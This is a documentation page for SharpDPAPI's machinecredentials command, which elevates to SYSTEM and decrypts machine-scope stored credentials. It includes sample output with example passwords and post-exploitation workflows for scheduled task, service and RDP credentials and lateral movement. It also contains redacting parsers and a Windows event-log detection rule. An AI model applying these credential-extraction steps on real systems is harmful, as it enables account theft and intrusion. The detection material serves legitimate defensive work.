
Overview

The machinecredentials command elevates to SYSTEM, retrieves the DPAPI_SYSTEM LSA secret, decrypts machine masterkeys, and uses them to decrypt all machine-scope Credential Manager files. This reveals credentials for scheduled tasks, services, and system-level saved passwords.
Machine credentials live in the system and service profile directories and are protected with machine-scope DPAPI; they frequently hold high-value credentials for scheduled tasks and service accounts.

Basic Usage

# Decrypt machine credentials (requires elevation)
SharpDPAPI.exe machinecredentials
This command requires elevation (Administrator privileges) to:
  • Elevate to SYSTEM via token duplication
  • Retrieve the DPAPI_SYSTEM LSA secret
  • Access system credential files

How It Works

  1. Elevation to SYSTEM: duplicates a SYSTEM token to elevate privileges
  2. DPAPI_SYSTEM retrieval: retrieves the DPAPI_SYSTEM LSA secret
  3. Masterkey decryption: decrypts all machine DPAPI masterkeys using DPAPI_SYSTEM
  4. Credential discovery: locates machine credential files in system directories
  5. Credential decryption: decrypts each credential file using machine masterkeys

Credential File Locations

Machine credentials are stored in:
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials\
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Credentials\

Example Output

SharpDPAPI.exe machinecredentials
Output:
[*] Action: Machine DPAPI Credential Triage

[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()

[*] Secret  : DPAPI_SYSTEM
[*]    full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*]    m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3

[*] SYSTEM master key cache:

{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
{0bd732d9-c396-4f9a-a69a-508632c05235}:8A9F2C1D3E4B5C6A7D8E9F0A1B2C3D4E5F6A7B8C

[*] Triaging System Credentials

Folder       : C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : C73A55F92FAE222C18A8989FEA28A1FE

    guidMasterKey    : {1cb83cb5-96cd-445d-baac-49e97f4eeb72}
    size             : 544
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782/26128
    description      : Local Credential Data

    LastWritten      : 3/24/2019 7:08:43 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{B745BF75-D62D-4B1C-84ED-F0437214ECED}
    TargetAlias      :
    Comment          :
    UserName         : TESTLAB\harmj0y
    Credential       : Password123!


Folder       : C:\WINDOWS\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials

  CredFile           : DFBE70A7E5CC19A398EBF1B96859CE5D

    guidMasterKey    : {0bd732d9-c396-4f9a-a69a-508632c05235}
    size             : 412
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782/26128
    description      : Local Credential Data

    LastWritten      : 5/15/2019 9:22:11 AM
    TargetName       : Domain:target=TERMSRV/10.10.10.50
    TargetAlias      :
    Comment          :
    UserName         : DOMAIN\service_account
    Credential       : P@ssw0rd!

Types of Machine Credentials Found

TargetName: Domain:batch=TaskScheduler:Task:{GUID}
  • Credentials for tasks running as specific users
  • Domain and local account passwords
  • Service account credentials
  • Automated job credentials
Why Valuable:
  • Often domain admin or privileged accounts
  • Used for administrative automation
  • Long-lived credentials
Various TargetNames
  • Windows service account passwords
  • Application pool identities
  • Background process credentials
  • System service accounts
Why Valuable:
  • Elevated privileges common
  • Network access credentials
  • Database access accounts
TargetName: Domain:target=TERMSRV/HOSTNAME
  • Saved Remote Desktop passwords
  • System-level RDP credentials
  • Service account RDP access
  • Jump box credentials
Why Valuable:
  • Lateral movement credentials
  • Administrative access
  • Server-to-server connections
TargetName: Various network targets
  • Network share credentials
  • SQL Server connections
  • Web service authentication
  • API credentials
Why Valuable:
  • Network resource access
  • Database credentials
  • Internal service accounts

Common Scenarios

After gaining admin access:
# Extract machine credentials
SharpDPAPI.exe machinecredentials

# Look for high-value credentials:
# - Scheduled tasks (Domain:batch=TaskScheduler)
# - RDP connections (TERMSRV)
# - Service accounts
# - Network resource access
Find and correlate task credentials:
# 1. Extract credentials
SharpDPAPI.exe machinecredentials

# 2. List scheduled tasks
schtasks /query /fo LIST /v

# 3. Correlate task GUIDs with credentials
# Look for TargetName: Domain:batch=TaskScheduler:Task:{GUID}

# 4. Find task details
schtasks /query /tn "\Task\Name" /v
Identify service credentials:
# 1. Extract machine credentials
SharpDPAPI.exe machinecredentials

# 2. Enumerate services
sc.exe query state= all

# 3. Check service configurations
sc.exe qc ServiceName

# 4. Correlate service accounts with found credentials
Collect credentials for lateral movement:
# Extract credentials
SharpDPAPI.exe machinecredentials

# Test discovered credentials:
# - RDP access (TERMSRV entries)
# - Network shares
# - Remote services
# - Database connections

Credential Flags

The flags field indicates protection scope:
Flag                         Value        Description
CRYPTPROTECT_SYSTEM          0x20000000   System credential protection
CRYPTPROTECT_UI_FORBIDDEN    0x1          No UI prompts allowed
CRYPTPROTECT_LOCAL_MACHINE   0x4          Machine-scope protection
Machine credentials typically have the CRYPTPROTECT_SYSTEM flag (0x20000000).
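The parser below is an added example and not SharpDPAPI code. It reads the Folder / CredFile / key : value layout of the example output shown earlier, decodes the flags field against the table in this section plus the algHash/algCrypt ids (CALG_* values from wincrypt.h), and classifies each TargetName into the categories listed under Types of Machine Credentials Found. The sample input is the example output reproduced from this page; the Credential field is redacted by default so the resulting inventory can be handed to the owners of the affected tasks and services for rotation without copying the secrets around.

```python
# Added example (not SharpDPAPI code): parse 'machinecredentials' output into an
# inventory, decode the flags / algorithm ids and classify each TargetName.
# Secrets are redacted by default so the inventory can go to the task owners.
import re

CRYPTPROTECT_FLAGS = {            # wincrypt.h CRYPTPROTECT_* bits
    0x1: "CRYPTPROTECT_UI_FORBIDDEN",
    0x4: "CRYPTPROTECT_LOCAL_MACHINE",
    0x20000000: "CRYPTPROTECT_SYSTEM",
}
CALG_NAMES = {32772: "CALG_SHA1", 32782: "CALG_SHA_512",   # wincrypt.h ALG_ID values
              26115: "CALG_3DES", 26128: "CALG_AES_256"}
TASK_RE = re.compile(r"^Domain:batch=TaskScheduler:Task:\{([0-9A-Fa-f-]{36})\}$")
KV_RE = re.compile(r"^([^:\s][^:]*?)\s*:\s?(.*)$")      # 'key : value' lines


def parse_machinecredentials(text, redact=True):
    """One dict per CredFile block; '[*]' status lines and the masterkey cache are skipped."""
    entries, folder, current = [], "", None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[*]"):
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "Folder":
            folder, current = value, None
        elif key == "CredFile":
            current = {"Folder": folder, "CredFile": value}
            entries.append(current)
        elif current is not None:          # key/value inside a CredFile block
            if key == "Credential" and redact:
                value = "<redacted %d chars>" % len(value)
            current[key] = value
    return entries


def decode_flags(flags_field):
    """'0x20000000 (CRYPTPROTECT_SYSTEM)' -> ['CRYPTPROTECT_SYSTEM']; unknown bits are reported."""
    value = int(flags_field.split()[0], 16)
    names = [n for bit, n in CRYPTPROTECT_FLAGS.items() if value & bit]
    unknown = value & ~sum(CRYPTPROTECT_FLAGS)
    return names + (["UNKNOWN_0x%X" % unknown] if unknown else [])


def decode_algs(alg_field):
    """'32782/26128' -> ('CALG_SHA_512', 'CALG_AES_256')"""
    return tuple(CALG_NAMES.get(int(x), "CALG_" + x) for x in alg_field.split("/"))


def classify_target(target):
    """(kind, detail): scheduled task GUID, RDP host, or the raw target for anything else."""
    m = TASK_RE.match(target)
    if m:
        return "scheduled_task", m.group(1).upper()
    if "TERMSRV/" in target:
        return "rdp", target.split("TERMSRV/", 1)[1]
    return "other", target


def summarize(entries):
    """Flatten parsed entries into triage rows (who, which target, which masterkey, how protected)."""
    rows = []
    for e in entries:
        kind, detail = classify_target(e.get("TargetName", ""))
        rows.append({"cred_file": e["CredFile"], "kind": kind, "detail": detail,
                     "user": e.get("UserName", ""), "masterkey": e.get("guidMasterKey", ""),
                     "flags": decode_flags(e.get("flags", "0x0")),
                     "algs": decode_algs(e.get("algHash/algCrypt", "0/0"))})
    return rows


# Sample input: the two CredFile blocks from the example output above (trimmed)
SAMPLE_OUTPUT = r"""
[*] Action: Machine DPAPI Credential Triage
[*] Secret  : DPAPI_SYSTEM
[*] SYSTEM master key cache:
{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C

Folder       : C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
  CredFile           : C73A55F92FAE222C18A8989FEA28A1FE
    guidMasterKey    : {1cb83cb5-96cd-445d-baac-49e97f4eeb72}
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782/26128
    LastWritten      : 3/24/2019 7:08:43 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{B745BF75-D62D-4B1C-84ED-F0437214ECED}
    TargetAlias      :
    UserName         : TESTLAB\harmj0y
    Credential       : Password123!

Folder       : C:\WINDOWS\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials
  CredFile           : DFBE70A7E5CC19A398EBF1B96859CE5D
    guidMasterKey    : {0bd732d9-c396-4f9a-a69a-508632c05235}
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782/26128
    TargetName       : Domain:target=TERMSRV/10.10.10.50
    UserName         : DOMAIN\service_account
    Credential       : P@ssw0rd!
"""

if __name__ == "__main__":
    for row in summarize(parse_machinecredentials(SAMPLE_OUTPUT)):
        print(row)
```

The masterkey column is worth keeping in the rows: several credentials sharing one guidMasterKey were written under the same machine masterkey, and a credential whose GUID is absent from the SYSTEM master key cache in the tool's output is the "partial decryption" case mentioned in the tips.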

Scheduled Task GUID Correlation

Match credential GUIDs to tasks:
# Get all scheduled tasks with GUIDs
Get-ScheduledTask | ForEach-Object {
    $task = $_
    # Pass -TaskPath as well: task names are only unique within a folder
    $info = Get-ScheduledTaskInfo -TaskName $task.TaskName -TaskPath $task.TaskPath -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        Name = $task.TaskName
        Path = $task.TaskPath
        User = $task.Principal.UserId
        LastRun = $info.LastRunTime
        NextRun = $info.NextRunTime
    }
}

# Find task by GUID from credential TargetName
# The GUID is in format: Task:{GUID}
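The comment above stops at the GUID format; the following added Python example (not SharpDPAPI code) does the lookup. It assumes the GUID in the TargetName is the task Id recorded under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks, whose Path value holds the task's folder path; load_taskcache reads that key on a Windows host (run elevated), while the run at the bottom uses a constructed index and target list. Beyond the plain join it reports orphaned GUIDs (a credential file still on disk for a task that no longer exists, which is cleanup work for the host owner) and labels each account as domain or local, the distinction the tips below ask for.

```python
# Added example (not SharpDPAPI code): join the Task:{GUID} targets from a
# machinecredentials inventory against the Task Scheduler's TaskCache, so each
# exposed credential can be tied to a task path and account type. Assumption:
# the GUID in the TargetName is the task Id used as the TaskCache\Tasks subkey.
# The sample index and target list below are constructed, not real data.
import re

TASK_RE = re.compile(r"^Domain:batch=TaskScheduler:Task:\{([0-9A-Fa-f-]{36})\}$")
TASKCACHE_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks"
LOCAL_AUTHORITIES = {".", "NT AUTHORITY", "NT SERVICE"}


def load_taskcache():
    """Build {GUID: task path} from the registry on a Windows host (run elevated)."""
    import winreg  # Windows-only module; not used by the sample run below
    index = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, TASKCACHE_KEY) as tasks:
        for i in range(winreg.QueryInfoKey(tasks)[0]):   # [0] = number of subkeys
            guid = winreg.EnumKey(tasks, i)
            with winreg.OpenKey(tasks, guid) as task:
                index[guid.strip("{}").upper()] = winreg.QueryValueEx(task, "Path")[0]
    return index


def account_scope(username, hostname):
    """'domain' for DOMAIN\\user; 'local' for .\\user, HOST\\user, NT AUTHORITY\\x or bare names."""
    if "\\" not in username:
        return "local"
    authority = username.split("\\", 1)[0].upper()
    return "local" if authority in LOCAL_AUTHORITIES or authority == hostname.upper() else "domain"


def correlate(targets, index, hostname):
    """targets: iterable of (TargetName, UserName) pairs from the inventory.
    Returns matched tasks, orphaned GUIDs (credential on disk, no task) and the
    number of non-task targets that were skipped."""
    result = {"matched": [], "orphaned": [], "skipped": 0}
    for target, user in targets:
        m = TASK_RE.match(target)
        if not m:
            result["skipped"] += 1
            continue
        guid = m.group(1).upper()
        if guid in index:
            result["matched"].append({"guid": guid, "task": index[guid], "user": user,
                                      "scope": account_scope(user, hostname)})
        else:
            result["orphaned"].append(guid)
    return result


# Constructed sample: one task with an exposed domain credential, one stale GUID,
# one RDP target that is not a task. The first GUID is the one from the output above.
SAMPLE_INDEX = {
    "B745BF75-D62D-4B1C-84ED-F0437214ECED": r"\Microsoft\Windows\Backup\NightlyBackup",
    "11111111-1111-1111-1111-111111111111": r"\Maintenance\LogRotate",
}
SAMPLE_TARGETS = [
    ("Domain:batch=TaskScheduler:Task:{B745BF75-D62D-4B1C-84ED-F0437214ECED}", r"TESTLAB\harmj0y"),
    ("Domain:batch=TaskScheduler:Task:{22222222-2222-2222-2222-222222222222}", r"WS01\localadmin"),
    ("Domain:target=TERMSRV/10.10.10.50", r"DOMAIN\service_account"),
]

if __name__ == "__main__":
    print(correlate(SAMPLE_TARGETS, SAMPLE_INDEX, hostname="WS01"))
```

On a live host, replace SAMPLE_INDEX with load_taskcache() and feed correlate the TargetName/UserName pairs from the tool's output; the task path returned is what schtasks /query /tn expects.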

Detection Considerations

Machine credential extraction is a high-privilege operation that should trigger security monitoring.
Host-Based Indicators:
  • Elevation to SYSTEM privileges
  • LSA secret retrieval (DPAPI_SYSTEM)
  • Access to system profile credential directories
  • Bulk credential file reading
  • Token duplication activity
Event Log Indicators:
Event ID: 4624 (Logon)
Logon Type: 3 (Network)
Account Name: SYSTEM

Event ID: 4656/4663 (Object Access)
Object Name: *\SystemProfile\AppData\Local\Microsoft\Credentials\*
Object Name: *\ServiceProfiles\*\Credentials\*
Object Name: LSA Secrets

Event ID: 4673 (Privileged Service Called)
Privileges: SeDebugPrivilege, SeImpersonatePrivilege
Defensive Monitoring:
  • Monitor SYSTEM token impersonation
  • Alert on LSA secret access (DPAPI_SYSTEM)
  • Track access to system credential directories
  • Detect bulk credential file enumeration
  • Monitor SharpDPAPI or similar tool execution
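As an added example (not from SharpDPAPI or its documentation), the rule below applies the indicators listed above to constructed Security log events: a 4673 token-privilege use by a process followed within a short window by 4656/4663 reads of files under the system or service profile Credentials directories, or any process touching more than one such file. Events are dicts in the shape a SIEM would normalise them into; the process paths and PIDs are made up, and the two credential file names are the ones from the example output.

```python
# Added example (not SharpDPAPI code): a detection over Windows Security events
# for the sequence described above: privileged-token use (4673) by a process that
# then reads credential files under the system / service profiles (4656/4663),
# or any process reading several of those files. Events are constructed dicts
# standing in for the fields a SIEM would carry; paths and PIDs are made up.
import re
from collections import defaultdict
from datetime import datetime

# Credential files under the machine-scope profile directories listed earlier
CRED_FILE_RE = re.compile(
    r"\\(?:System32\\config\\systemprofile|ServiceProfiles\\[^\\]+)"
    r"\\AppData\\Local\\Microsoft\\Credentials\\([0-9A-Fa-f]{32})$", re.IGNORECASE)
TOKEN_PRIVILEGES = {"SeDebugPrivilege", "SeImpersonatePrivilege"}


def detect(events, window_seconds=120, bulk_threshold=2):
    """Return one alert per process that read >= bulk_threshold credential files or
    used a token privilege within window_seconds before its first credential read."""
    priv_use = []                                   # (time, pid, privilege)
    readers = defaultdict(lambda: {"files": set(), "first": None})
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["event_id"] == 4673 and ev.get("privilege") in TOKEN_PRIVILEGES:
            priv_use.append((t, ev["pid"], ev["privilege"]))
        elif ev["event_id"] in (4656, 4663):
            m = CRED_FILE_RE.search(ev.get("object_name", ""))
            if m:
                rec = readers[(ev["pid"], ev["process"])]
                rec["files"].add(m.group(1).upper())
                rec["first"] = rec["first"] or t   # keep the earliest read
    alerts = []
    for (pid, process), rec in readers.items():
        reasons = []
        if len(rec["files"]) >= bulk_threshold:
            reasons.append("bulk_credential_read")
        privs = sorted({p for t, p_pid, p in priv_use if p_pid == pid
                        and 0 <= (rec["first"] - t).total_seconds() <= window_seconds})
        if privs:
            reasons.append("token_privilege_use:" + ",".join(privs))
        if reasons:
            alerts.append({"pid": pid, "process": process,
                           "files": sorted(rec["files"]), "reasons": reasons})
    return alerts


TOOL = r"C:\Users\alice\Downloads\SharpDPAPI.exe"      # constructed path
SVCHOST = r"C:\Windows\System32\svchost.exe"
SYSPROFILE = r"C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials"
LOCALSVC = r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials"

# Constructed events; the two credential file names are the ones from the example output.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:00", "event_id": 4673, "pid": 4242, "process": TOOL,
     "privilege": "SeDebugPrivilege"},
    {"time": "2024-05-01T09:00:01", "event_id": 4673, "pid": 4242, "process": TOOL,
     "privilege": "SeImpersonatePrivilege"},
    {"time": "2024-05-01T09:00:03", "event_id": 4663, "pid": 4242, "process": TOOL,
     "object_name": SYSPROFILE + r"\C73A55F92FAE222C18A8989FEA28A1FE"},
    {"time": "2024-05-01T09:00:03", "event_id": 4663, "pid": 4242, "process": TOOL,
     "object_name": LOCALSVC + r"\DFBE70A7E5CC19A398EBF1B96859CE5D"},
    # Benign: the Task Scheduler service reading the single credential of a task it launches
    {"time": "2024-05-01T09:05:00", "event_id": 4663, "pid": 1180, "process": SVCHOST,
     "object_name": SYSPROFILE + r"\C73A55F92FAE222C18A8989FEA28A1FE"},
    # Benign: unrelated object access, and a debugger using SeDebugPrivilege with no credential reads
    {"time": "2024-05-01T09:06:00", "event_id": 4663, "pid": 3001,
     "process": r"C:\Windows\System32\notepad.exe", "object_name": r"C:\Users\alice\notes.txt"},
    {"time": "2024-05-01T09:10:00", "event_id": 4673, "pid": 5555,
     "process": r"C:\Tools\windbg.exe", "privilege": "SeDebugPrivilege"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two prerequisites decide whether these events exist at all: 4656/4663 for these paths are only generated when an audit SACL covers the Credentials directories and the File System object-access subcategory is enabled, and 4673 requires Sensitive Privilege Use auditing, which is noisy on its own. That noise is why the rule counts privilege use only when the same process goes on to read credential files, and why a single read (the Task Scheduler service starting a task) does not alert while reads across several files do.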

Tips

  • Focus on scheduled task credentials (often privileged)
  • Correlate task GUIDs with task details
  • Test RDP credentials immediately
  • Check service account privileges
  • Look for domain accounts vs local
Operational considerations:
  • Requires elevation (high visibility)
  • SYSTEM privilege elevation generates events
  • LSA secret access triggers alerts
  • Consider timing and detection capabilities
  • May trigger EDR behavioral detections
Troubleshooting:
Access denied:
  • Need Administrator privileges
  • UAC may block elevation
  • Security software may prevent SYSTEM access
  • Try running as SYSTEM directly
No credentials found:
  • System may not have saved machine credentials
  • Credentials may be in vault instead
  • Check ServiceProfiles directories
  • Scheduled tasks may use group policy credentials
Partial decryption:
  • Some credentials may use different masterkeys
  • Verify DPAPI_SYSTEM was retrieved correctly
  • Check all system profile directories

Correlating with System Activity

Scheduled Tasks:
# View task details with credentials
Get-ScheduledTask | Where-Object {$_.Principal.UserId -ne "SYSTEM"} |
  Select-Object TaskName, @{N='User';E={$_.Principal.UserId}}
Windows Services:
# Services running as domain accounts
Get-WmiObject Win32_Service |
  Where-Object {$_.StartName -like "*\*" -and $_.StartName -ne "LocalSystem"} |
  Select-Object Name, DisplayName, StartName, State
Process Credentials:
# Processes running as specific accounts
Get-Process -IncludeUserName |
  Where-Object {$_.UserName -like "*\*"} |
  Group-Object UserName |
  Select-Object Name, Count

Understanding Credential Context

Machine credentials are saved when:
  1. Scheduled Task Creation:
    • Task configured to run as specific user
    • Password saved in Credential Manager
    • Protected with machine masterkey
  2. Service Installation:
    • Service configured with service account
    • Credentials stored for service startup
    • Machine-scope DPAPI protection
  3. System-Level Operations:
    • Administrative tools saving credentials
    • Backup software credentials
    • Monitoring tools
    • Remote management tools